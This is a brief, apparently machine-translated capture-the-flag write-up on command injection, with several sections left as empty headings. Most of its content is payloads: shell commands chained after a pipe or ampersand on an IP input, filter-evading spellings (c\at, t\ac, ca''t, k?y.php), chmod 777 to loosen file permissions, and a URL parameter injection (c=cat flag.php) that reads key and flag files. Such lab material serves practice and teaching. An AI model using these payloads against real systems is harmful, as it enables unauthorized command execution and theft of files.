One 、 The first

1、 Topic environment

2、 take key

2.1、 Get directory

127.0.0.1 | ls

127.0.0.1 | ls ../

2.2、 Read the file

 Common command execution functions ：
system("ls");
eval、exec

linux Reading documents ： cat、tac、less、more、head、tail
ca\t、ca''t、cat""t

 If the key.php Do the filter ：
key.*  k{
    e}y.php k?y.php

127.0.0.1 | c\at ../key.php

127.0.0.1 | t\ac ../key.php

The second way

1、 Topic environment

2、 The problem solving steps

2.1 Get directory

2.2 Increase authority

127.0.0.1 & l\s -al ../key.*
127.0.0.1 & chmo\d 777 ../key.*
127.0.0.1 & l\s -al ../key.*

2.3 obtain key

127.0.0.1 & t\ac ../key.*

3、 ... and 、 The third way

1、 Topic environment

2、 The problem solving steps

The fourth way

1、 Topic environment

2、 The problem solving steps

2.1、ls

2.2、 obtain key

http://81.70.245.6:50289?c=cat flag.php;